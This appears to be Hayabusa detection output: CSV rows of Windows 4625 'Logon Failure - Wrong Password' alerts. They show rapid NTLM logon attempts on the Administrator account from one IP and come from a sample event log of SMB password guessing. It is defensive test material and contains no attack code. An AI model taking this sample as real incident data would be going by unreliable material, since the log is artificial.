NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.205 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.660 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.156 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
